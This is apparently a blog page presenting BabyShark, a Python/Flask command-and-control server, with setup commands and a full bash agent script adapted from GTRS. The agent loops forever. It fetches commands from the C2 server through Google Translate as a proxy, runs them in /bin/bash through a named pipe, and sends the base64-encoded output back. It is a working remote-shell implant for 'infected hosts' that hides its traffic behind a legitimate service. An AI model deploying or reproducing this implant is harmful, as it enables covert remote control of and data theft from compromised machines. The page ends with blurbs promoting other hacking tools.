BabyShark is a basic C2 generic server written in Python and Flask.
This code has based idea to GTRS, which uses Google Translator as a proxy for sending commands to the infected host. The BabyShark project aims to centralize reverse connections with agents, creating a way to centralize several types of connections in one place.
BabyShark does not generate infection agents, but it does offer a template to connect to it.
Installation
git clone https://github.com/danilovazb/BabyShark/
cd BabyShark
mkdir database
sqlite3 database/c2.db < schema.sql
Also Read – ANDRAX : NH-Killer Penetration Testing On Android
Agents Model
GTRS – https://github.com/mthbernardes/GTRS
This client example from GTRS for connect to BabyShark:
#!/bin/bash if [[ $# < 2 ]];then echo -e "Error\nExecute: $0 www.c2server.com secretkey-provided-by-the-server\n" exit fi running=true secretkey="b4bysh4rk" user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" data="Content-Hype: " c2server="http://babyshark/momyshark?key=$secretkey" result="" input="/tmp/input" output="/tmp/output" function namedpipe(){ rm "$input" "$output" mkfifo "$input" tail -f "$input" | /bin/bash 2>&1 > $output & } function getfirsturl(){ url="https://translate.google.com/translate?&anno=2&u=$c2server" first=$(curl --silent "$url" -H "$user_agent" | xmllint --html --xpath '//iframe/@src' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g' ) } function getsecondurl(){ second=$(curl --silent -L "$first" -H "$user_agent" | xmllint --html --xpath '//a/@href' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g') } function getcommand(){ if [[ "$result" ]];then command=$(curl --silent $second -H "$result" ) else command=$(curl --silent $second -H "$user_agent" ) command1=$(echo "$command" | xmllint --html --xpath '//span[@class="google-src-text"]/text()' - 2>/dev/null) command2=$(echo "$command" | xmllint --html --xpath '/html/body/main/div/div/div/div/ul/li/span/text()' - 2>/dev/null ) if [[ "$command1" ]];then command="$command1" else command="$command2" fi fi } function talktotranslate(){ getfirsturl getsecondurl getcommand } function main(){ result="" sleep 10 talktotranslate if [[ "$command" ]];then if [[ "$command" == "exit" ]];then running=false fi echo $command echo -n > $output idcommand=$(echo $command | cut -d '#' -f2) echo "$command" > "$input" sleep 2 outputb64=$(cat $output | tr -d '\000' | base64 | tr -d '\n' 2>/dev/null) if [[ "$outputb64" ]];then result="$user_agent | $outputb64 | $idcommand " talktotranslate fi fi } namedpipe while "$running";do main done
Next Steps
This repository contains tools created by yogSahare0 while learning Python 3 for ethical hacking and penetration testing.…
"NetSecChallenger" provides a suite of automated tools designed for security professionals and network administrators to…
The essential tool for cybersecurity enthusiasts! This guide provides a detailed walkthrough on how to…
Meet "Poodone," the ultimate Python script designed for cybersecurity enthusiasts and professionals alike. Packed with…
The Linux version is no longer supported! The last Linux version is 6.0 that you…
Jin is a hacking command-line tools designed to make your scan port, gathering urls, check…